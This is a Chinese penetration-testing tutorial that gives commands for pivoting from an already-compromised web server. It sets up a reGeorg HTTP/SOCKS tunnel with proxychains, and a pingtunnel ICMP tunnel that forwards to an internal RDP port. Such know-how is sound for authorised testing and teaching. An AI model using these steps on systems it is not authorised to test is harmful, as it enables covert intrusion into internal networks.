渗透测试之隧道搭建

基于HTTP协议

reGeorg搭建HTTP隧道

1  配置服务端

下载reGeorg

git clone https://github.com/sensepost/reGeorg.git

在已经getshell的受害者服务器上的http服务器的web根目录上传一个tunnel.jsp传完后,

测试是否可以访问到

curl http://服务端ip:8080/tunnel.jsp

 服务器返回Georg says, 'All seems fine'

服务器端配置完成

2、在攻击者机子上,下载reGeorg运行脚本,设置一个端口3333作为http隧道的端口

python reGeorgSocksProxy.py -l 0.0.0.0 -p 3333 -u http://x.x.x.x:8080/tunnel.jsp

3、打开kali攻击机的proxychain设置,设置一下代理。将代理设置为vps的ip的3333端口

vim/etc/proxychains.conf
在最后添加一条

socks5 本地ip 3333

在kali上通过代理访问内网的服务器

proxychains curl http://172.17.0.2/login.php

基于ICMP协议

pingtunnel搭建icmp隧道

下载Pingtunnel:

wget http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.72.tar.gz
tar -xzvf PingTunnel-0.72.tar.gz
cd PingTunnel
make && make install

    如果发生pcap.h缺失的错误:

wget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz 
tar zxvf libpcap-1.9.0.tar.gz 
cd libpcap-1.9.0 
./configure

        如果再发生Neither flex nor let was found,需要安装libcap依赖的环境

Kali:apt-get install flex bison
Centos7:yum install flex bison

     在当前目录重新执行

./configure
make
sudo make install

回到Pingtunnel目录,重新执行

make && make install

搭建隧道

在目标服务器执行

ptunnel -x client

在攻击机上执行:

ptunnel -p 目标服务器ip -lp 1080 -da 内网ip -dp 3389 -x client

命令解读:
#-p 指定ICMP隧道另一端机器的IP
#-lp:指定本地监听的端口
#-da:指定要转发的目标机器的IP
#-dp:指定要转发的目标机器的端口
#-x:指定连接密码
连接攻击机的1080端口,相当于连接内网数据库服务器的3389

参考

[1] reGeorg搭建HTTP隧道和流量分析 - FreeBuf网络安全行业门户

[2]内网渗透:利用pingtunnel搭建icmp隧道_安全大白-CSDN博客

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值